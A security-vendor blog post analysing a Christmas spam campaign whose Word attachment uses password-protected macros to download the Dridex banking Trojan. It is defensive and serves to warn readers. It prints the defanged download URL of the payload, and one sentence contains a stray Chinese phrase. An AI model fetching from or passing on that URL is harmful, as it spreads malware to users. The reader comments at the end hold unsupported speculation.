Spammers are using the theme of the season in their latest attempt to infect computers worldwide.
The email is accompanied by a Word document with a catchy name:CHRISTMAS OFFERS.docx
It might be tempting to open the file to see what these offers are all about. However, the document is blank and requires the user to enable macros in order to view it.
By default Microsoft Office disables macros, a handy automation feature but also a huge security risk.
这是社会工程所在crooks are counting on people so eager to see the promised content that they will push the button and get infected.
Macros enable you to create scripts that automate repetitive tasks within a document, for example copying content from one page and pasting it with a different font and color on another.
At the same time, a macro can be used to perform a malicious action, which happens to be the case here.
The authors have created several macros in fact:
One might want to see what they look like by clicking theEditbutton, but the crooks password protected the code:
This is not a problem though. We can use a tool called OfficeMalScanner to extract the macros:
The extracted code can be opened in a text editor for full review. This is VBA code (Visual Basic for Applications) which makes interesting API calls, such as downloading a file, any file, from an external URL (do you see the security implications of this?).
All the user has to do is clickEnable Content, orEnable Macrosfor this malicious code to launch its payload.
What happens if you were to trust the document?
A remote file is downloaded from
hxxp://jasoncurtis.co.uk/js/bin.exe
and ran from the temp folder:
It is known asDridex, a banking Trojan already detected by Malwarebytes Anti-Malware.
Macro malware often relies on social engineering to convince the mark to open a file and disable the default protection.
It is not terribly sophisticated but yet it has seen a bit of a revive in recent months with spam being the preferred delivery method.
The best protection against these types of threats is to be particularly cautious before opening attachments, even if they are ‘classic’ Microsoft Office documents.
Users ofMalwarebytes Anti-Exploit Premiumwere already protected against this attack thanks to MBAE’s signature-less engine:
This holiday season, whether you believe in Santa or not, please be extra cautious with offers that sound too good to be true. The bad guys like to make believe, but we’d rather leave them empty handed or send them off with a lump of coal.
This doesn’t seem to be up to their usual slick standards. But the Christmas season and New Years hasn’t gone by yet. So hold on to your credit cards.
Is it possible this current scam is an example of the Dirt Bag unit in-training? We all know the Russians trained Jihadis in the Libyan desert in the 70’s. After all you can’t have the only once Dirtbag training in cyber terrorism. What do you think ?
I don’t think so. Criminals seem to operate with the least amount of risk to themselves. This isn’t a religious or political operation, just one that aims to take as much money as possible from anyone that opens the file.
Look people you are just trying to get your face on the internet. So can you control your vanity long enough to understand some criminal loves you and your private information and all the credit card numbers he can steal?? Get a grip! Leave the vanity stuff to Kim Kardashian. lol